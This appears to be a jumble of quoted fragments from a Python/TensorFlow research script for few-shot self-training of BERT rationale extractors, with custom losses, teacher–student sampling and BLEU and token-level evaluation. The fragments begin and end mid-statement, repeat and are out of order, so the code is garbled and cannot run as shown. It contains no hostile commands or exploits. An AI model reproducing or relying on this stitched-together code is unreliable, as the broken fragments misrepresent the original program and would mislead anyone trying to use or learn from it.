pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp)", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = None if '_noexp' in type_: loss_weights = [1.0, 0.0] else:", ">= max_best_acc: max_best_acc = test_task_acc model_file = os.path.join(model_dir, \"model_token_{}_{}.h5\".format(epoch, sample_scheme)) model_file_task = os.path.join(model_dir,", "'not_rationale_task_classifier': custom_loss_neg}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'],", "= tp/(tp+fn+0.0000001) logger.info(\"Token-level: {}\".format((tp)/(tp+(0.5*(fp+fn))))) logger.info(\"Rationale coverage (recall): {}\".format(r)) logger.info(\"Token Precision: {}\".format(p)) logger.info(\"Token overlap:", "train_model(max_seq_length, X, y, X_test, y_test, X_unlabeled, model_dir, tokenizer, sup_batch_size=4, unsup_batch_size=32, unsup_size=4096, sample_size=16384, TFModel=TFBertModel,", "with strategy.scope(): if 'mtl' in type_: rat_loss = None if 'focal' in type_:", "axis=-1) logger.info(\"Printing prediction data on teacher model for run {}: {}\".format(counter, test_pred)) tp,", "{} \".format(score4/len(pred))) data = [] for i in range(len(X_test[\"input_ids\"])): text = tokenizer.decode(X_test[\"input_ids\"][i]) temp", "tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc',", "model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") elif type_ == 'joint': rat_loss", "#acc = acc[:,None] #y_batch = np.concatenate((acc[indices], y_pred), axis=1) acc = acc[:,None] y_batch =", "= np.where(attention_mask_r==0, 1, 0) negation_mask[:,0] = 1 X_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']),", "with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]],", "'norm' in type_: X_conf[:,1:] = tf.nn.softmax(X_conf[:,1:], axis=0) #X_conf = np.ones((len(X_batch['input_ids']), max_seq_length)) for i", "SparseCategoricalFocalLoss(gamma=2, reduction=tf.keras.losses.Reduction.NONE) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]),", "y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:]}, y[train_size:] else: X_train, y_train =", "'mtl': test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-1] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2]", "elif 'joint' in type_: out = model.predict(X_unlabeled, batch_size=64) acc, y_pred, r_acc = out[0],", "GLOBAL_SEED = int(os.getenv(\"PYTHONHASHSEED\")) random.Random(GLOBAL_SEED).shuffle(indx) if len(indx) > unsup_size: indx = indx[:unsup_size] logger.info(\"Shape of", "np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:],", "np.ones(len(y_dev))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) elif 'joint_neg' in type_: logger.info(\"Training for", "[1.0, 1.0, 1.0, 1.0] if '_noexp' in type_: loss_weights = [1.0, 0.0, 0.0,", "np.array([i for i in range(len(y_pred))]) acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices]), axis=1)", "logger.info (\"Class labels {}\".format(labels)) #split X and y to train and dev with", "in type_: cce = SparseCategoricalFocalLoss(gamma=2, reduction=tf.keras.losses.Reduction.NONE) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss =", "logger.info(y_pred) return kb.mean(y_true*y_pred, axis=-1) with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier':", "logger.info(\"Training for without rationales\") with strategy.scope(): def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE)", "(task) {}\".format(task_acc)) max_task_acc = task_acc model.save_weights(model_file_best) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] test_task_acc", "rationales selected: {}\".format(np.mean(np.sum(attention_mask_r, axis=-1)))) attention_mask_r[:,0] = 1 negation_mask = np.where(attention_mask_r==0, 1, 0) negation_mask[:,0]", "(macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='micro'))) logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='macro'))) logger.info(\"Model", "task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[3] val_loss = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[0] elif", "y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:], X_conf[:,0], np.ones((len(y_batch)))]) #", "[y_dev[:,0], y_dev, y_dev[:,0], y_neg_dev], verbose=0)[-3] if test_acc > max_test_acc: max_test_acc = test_acc test_task_acc", "y_test[:,0], np.full((len(y_test), len(labels)), 1/len(labels))]) task_acc, test_acc, r_acc = out[3], out[4], out[5] elif 'joint'", "elif 'joint' in type_: out = model.predict(X_test) class_acc, test_pred, r_acc = out[0], out[1],", "batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) tf.keras.backend.clear_session() if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model", "temp['text'] = ' '.join(text) temp['truth'] = truth[i] temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split())", "temp_p, temp_t, ct = [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] for j in range(0,len(test_pred[0])-1):", "{}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='micro'))) logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='macro'))) logger.info(\"Model performance", "logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc = task_acc best_val_acc = task_acc model.save_weights(model_file_best) #_student", "y_dev[:,1:]]) elif '_neg' in type_ : y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:],", "0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] #logger.info(\"Test sample {}\".format(temp)) for j in range(0,len(test_pred[0])-1): if test_pred[i][j]", "rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_mtl(TFModel, Config, pt_teacher_checkpoint, max_seq_length,", "axis=0) #X_conf = np.ones((len(X_batch['input_ids']), max_seq_length)) for i in range(len(cls)): X_conf[i,0] = class_weight[cls[i][0]]*X_conf[i,0] #logger.info", "(teacher model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on test set (teacher model):", "= (probs+1e-10) #+(1-y_batch[:,0])*np.log(1-probs+1e-10)) log_rationale = (probs_rat+1e-10) if 'rwt' in type_: #re-weight labels X_conf[:,0]", "dict() temp['text'] = ' '.join(text) temp['truth'] = truth[i] temp['pred'] = pred[i] temp['score'] =", "r_acc = np.argmax(r_acc, axis=-1) #compute confidence on the unlabeled set if sample_size <", "if test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: temp_t.append(temp[j]) pred_1 += test_pred[i].sum()", "rat_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) y_neg = np.full((len(y_train),len(labels)),", "predictions shape {}\".format(class_acc.shape)) logger.info(\"Teacher model best score (macro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='macro'))) logger.info(\"Teacher model", "'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices]}, y_pred[indices] else: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids':", "0. if 'mtl' in type_: logger.info(\"y_test: {}\".format(y_test)) test_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[4]", "elif 'joint' in type_: out = model.evaluate(X_test, [y_test[:,0], y_test, y_test[:,0], np.ones(len(y_test))]) task_acc, test_acc,", "os.path.join(model_dir, \"model_best.h5\") if os.path.exists(model_file): model.load_weights(model_file) #model_task.load_weights(model_file_task) best_base_model = model logger.info (\"Model file loaded", "(\"Starting loop {}\".format(epoch)) if type_ == 'mtl': test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-1]", "np.ones(len(y_dev))], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] val_loss = model.evaluate(X_dev,", "indices = [] for i in labels: indx = np.where(y_batch[:,0]==i)[0] GLOBAL_SEED = int(os.getenv(\"PYTHONHASHSEED\"))", "on {} number of instances\".format(len(X_unlabeled[\"input_ids\"]))) X_unlabeled_sample = X_unlabeled #X_unlabeled_sample = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids':", "loss_weights = [1.0, 1.0, 0, 0] model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':rat_loss, 'rationale_task_classifier': None,", "fn += (y_test[i].sum()-ct) p = tp/(tp+fp+0.0000001) r = tp/(tp+fn+0.0000001) logger.info(\"Token-level: {}\".format((tp)/(tp+(0.5*(fp+fn))))) logger.info(\"Rationale coverage", "else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_joint(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob,", "logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc = task_acc model.save_weights(model_file_best) val_acc = model.evaluate(X_dev, [y_dev[:,0],", "if '_noexp' in type_: loss_weights = [1.0, 0, 0, 0] elif '_no_suffcomp' in", "import nltk import tensorflow as tf import tensorflow.keras as K import tensorflow.keras.backend as", "y_dev[:,1:]], verbose=0)[-1] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]],", "1:] = np.where(y_pred[i]==0, 103, X_sample[\"input_ids\"][i, 1:]) if '_neg' in type_: X_negation_sample[\"input_ids\"][i, 1:] =", "= truth[i] temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_'+type_+'.json'), 'w')", "= SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_joint(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels),", "tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.Mean(name='mean')]) #X_batch.update(X_rationale_batch) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch,", "shape: {}\".format(X_conf.shape)) if 'mtl' in type_: #model = model_student logger.info(y_batch.shape) model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:]],", "np.concatenate((acc, y_pred), axis=1) logging.info(\"y_batch shape {}\".format(y_batch.shape)) indices = [] for i in labels:", "tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss = 0.0 #logger.info(l1_loss) return cce_loss + 0.1*l1_loss", "type_=type_) probs = y_val[indices] probs_rat = y_rat[indices] cls = list(acc[indices]) logger.info(cls) X_conf =", "average='macro'))) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[0] if task_acc > max_task_acc:", "X_conf[:,1:]]) elif type_ == 'joint': logger.info(type_) def custom_loss(y_true, y_pred): logger.info(y_pred) return kb.mean(y_true*y_pred, axis=-1)", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance': None}) elif 'joint_neg'", "= np.argmax(acc, axis=-1) elif 'joint' in type_: if 'pruthi_' in type_: out =", "acc (task) {}\".format(task_acc)) max_task_acc = task_acc best_val_acc = task_acc model.save_weights(model_file_best) #_student = deepcopy(model)", "0.1*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus))", "{}\".format(X_unlabeled[\"input_ids\"].shape)) strategy = tf.distribute.MirroredStrategy() gpus = strategy.num_replicas_in_sync logger.info('Number of devices: {}'.format(gpus)) #run the", "if valid_split > 0: train_size = int((1. - valid_split)*len(X[\"input_ids\"])) if '_neg' in type_:", "for Self-training for Rationale using few-shot learning. This code base is adapted from", "task=None): #labels = [0, 1] #fix hardcoding labels = set(y[:,0]) logger.info (\"Class labels", "= model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[3] val_loss = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[0] elif '_neg'", "np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": attention_mask_r} #mask tokens that are not rationales u-r if '_neg' in", "for i in range(len(y_pred)): X_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, 103, X_sample[\"input_ids\"][i, 1:]) if '_neg'", "#X_batch.update(X_rationale_batch) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch, y_batch[:, 0],", "0, 0] elif '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0] '''", "f1_score from sklearn.metrics import precision_recall_fscore_support logger = logging.getLogger('STRationale') def create_learning_rate_scheduler(max_learn_rate=5e-5, end_learn_rate=1e-7, warmup_epoch_count=10, total_epoch_count=90):", "type_: out = model.evaluate(X_test, [y_test[:,0], y_test, y_test[:,0], np.ones(len(y_test))]) task_acc, test_acc, r_acc = out[3],", "{} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on test set (student model): {} \".format(score4/len(pred)))", "[y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3]", "\"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_pred[indices] if type_ == 'decoupled' or ('joint' in type_): X_sample =", "class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]]) elif '_neg' in type_ : y_neg =", "pred_0+= max_seq_length-pred_1 truth_1 += y_test[i].sum() truth_0+= max_seq_length-truth_1 pred.append(' '.join(temp_p)) truth.append(' '.join(temp_t)) for word", "temp_t.remove(word) else: fp+=1 tp +=ct fn += (y_test[i].sum()-ct) p = tp/(tp+fp+0.0000001) r =", "val_loss model.save_weights(model_file_best) #_student = deepcopy(model) ''' if test_acc > max_test_acc: max_test_acc = test_acc", "{}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) elif 'joint' in type_: out = model_student.predict(X_test) acc, y_pred, r_acc", "to train and dev with valid_split if valid_split > 0: train_size = int((1.", "counter == 0: logger.info(model.summary()) model_file = os.path.join(model_dir, \"model_label.h5\") model_file_task = os.path.join(model_dir, \"model_task.h5\") model_file_best", "on test set (teacher model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on test", "[y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0)[-3] if '_neg' in type_: y_neg_dev = np.full((len(y_dev), len(labels)),", "# class_weight=class_weight) tf.keras.backend.clear_session() if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file))", "indices.extend(indx) indices = np.asarray(indices) #indices = np.random.choice(len(X_unlabeled_sample['input_ids']), unsup_size, replace=False) X_batch, y_batch = {\"input_ids\":", "= model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.full((len(y_test), len(labels)), 1/len(labels))]) task_acc, test_acc, r_acc = out[3],", "callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:], X_conf[:,0], np.ones((len(y_batch)))]) # class_weight=class_weight) if 'fine_tune_teacher' in type_:", "[y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-3]", "unlabeled set if 'uni' in sample_scheme: logger.info (\"Sampling uniformly\") if unsup_size < len(X_unlabeled_sample['input_ids']):", "'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = [1.0,", "pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_teacher_'+type_+'.json'), 'w') as f: json.dump(data, f)", "in type_ : y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg], shuffle=True,", "y_train[:,1:], y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=sup_batch_size*1,", "1/len(labels)) y_dev_plg = [y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),len(labels)), 1/len(labels))] y_test_plg = [y_test[:,1:], y_test[:,0], np.full((len(y_test),len(labels)), 1/len(labels))]", "total_epoch_count=90): def lr_scheduler(epoch): if epoch < warmup_epoch_count: res = (max_learn_rate/warmup_epoch_count) * (epoch +", "y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) elif 'joint' in type_:", "X_conf[:,1:], X_conf[:,0], np.ones((len(y_batch)))]) # class_weight=class_weight) if 'fine_tune_teacher' in type_: rat_loss = None if", "#logger.info (X_unlabeled_sample[\"input_ids\"][:5]) if 'joint' in type_: ids = [] attention_mask_r = np.ones((len(y_pred), max_seq_length))", "= tf.nn.softmax(X_conf[:,0], axis=0) if '_r_' in type_: #re-weight rationales X_conf[:,1:] = np.where(log_rationale>0, log_rationale,", "np.concatenate((acc[indices], y_pred[indices]), axis=1) X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if 'joint'", "'_neg' in type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size],", "valid_split=0.5, sup_epochs=70, unsup_epochs=25, N_base=10, dense_dropout=0.5, attention_probs_dropout_prob=0.3, hidden_dropout_prob=0.3, test_data=None, unlabeled_data=None, class_weight=None, type_=\"token\", X_dev=None, y_dev=None,", "type_: out = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.full((len(y_test), len(labels)), 1/len(labels))]) task_acc, test_acc, r_acc", "= {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices], 'input_ids_neg':X_unlabeled['input_ids_neg'][indices], 'token_type_ids_neg':X_unlabeled['token_type_ids_neg'][indices], 'attention_mask_neg':X_unlabeled['attention_mask_neg'][indices]},", "= model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]) logger.info (\"Validation loss for run {} :", "strategy.num_replicas_in_sync logger.info('Number of devices: {}'.format(gpus)) #run the base model n times with different", "def custom_loss(y_true, y_pred): logger.info(y_pred) return kb.mean(y_true*y_pred, axis=-1) with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),", "= [0.5, 0.5] with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\")", "[y_test[:,0], y_test[:,1:]], verbose=0) logger.info(\"Print acc (task) for joint {}\".format(temp)) logger.info (\"Val acc (token)", "0.0, 0.0 for i in range(len(pred)): score1 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(1, 0, 0, 0))", "epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': custom_loss}, metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.Mean(name='mean')])", "verbose=0) logger.info(\"Print acc (task) for joint {}\".format(temp)) logger.info (\"Val acc (token) {}\".format(test_acc)) logger.info", "X_train, y_train = X, y X_dev, y_dev = X_dev, y_dev logger.info(\"X Train Shape:", "model for run {}: {}\".format(counter, test_pred)) tp, fn, fp = 0, 0, 0", "'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices], 'input_ids_neg':X_unlabeled['input_ids_neg'][indices], 'token_type_ids_neg':X_unlabeled['token_type_ids_neg'][indices], 'attention_mask_neg':X_unlabeled['attention_mask_neg'][indices]}, y_pred[indices] elif 'joint' in type_: X_unlabeled_sample, y_pred =", "in type_: loss_weights = [1.0, 0, 0, 0] elif '_no_suffcomp' in type_: loss_weights", "run {} : {}\".format(counter, val_loss)) if val_loss[0] < best_validation_loss: best_base_model = model best_validation_loss", "val_loss[0] model = best_base_model ''' if 'mtl' in type_: logger.info (\"Best validation acc", "= np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #compute", "np.full((len(y_test), len(labels)), 1/len(labels))]) task_acc, test_acc, r_acc = out[3], out[4], out[5] elif 'joint' in", "val_loss = 0. if 'mtl' in type_: logger.info(\"y_test: {}\".format(y_test)) test_acc = model.evaluate(X_test, [y_test[:,0],", "#y_rat = y_rat[:, 1:] #y_pred = y_pred[:,1:] # sample from unlabeled set if", "= [1.0, 0.0] else: loss_weights = [0.5, 0.5] with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),", "verbose=0)[-1] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[0]", "epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss", "res = (max_learn_rate/warmup_epoch_count) * (epoch + 1) else: res = max_learn_rate*math.exp(math.log(end_learn_rate/max_learn_rate)*(epoch-warmup_epoch_count+1)/(total_epoch_count-warmup_epoch_count+1)) return float(res)", "y_train.shape)) logger.info(\"X Dev Shape: {} {}\".format(X_dev[\"input_ids\"].shape, y_dev.shape)) logger.info(\"X Test Shape: {} {}\".format(X_test[\"input_ids\"].shape, y_test.shape))", "or ('joint' in type_): X_sample = {\"input_ids\": X_sample['input_ids'][indices], \"token_type_ids\": X_sample['token_type_ids'][indices], \"attention_mask\": X_sample['attention_mask'][indices]} '''", "y_test_plg = [y_test[:,1:], y_test[:,0], np.full((len(y_test),len(labels)), 1/len(labels))] test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev],", "#l2_loss = 0.0 #logger.info(l1_loss) return cce_loss + 0.1*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred):", "y_dev[:,1:]]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]]) elif", "= None, None, None if 'mtl' in type_: acc, y_pred = model.predict(X_unlabeled_sample, batch_size=256)", "len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) y_dev_plg = [y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),len(labels)), 1/len(labels))]", "as tf import tensorflow.keras as K import tensorflow.keras.backend as kb import tensorflow_addons as", "test_pred = np.argmax(tf.nn.softmax(test_pred, axis=-1), axis=-1) logger.info(\"Printing prediction data on teacher model for run", "acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #compute confidence on the unlabeled", "Precision: {}\".format(p)) logger.info(\"Token overlap: 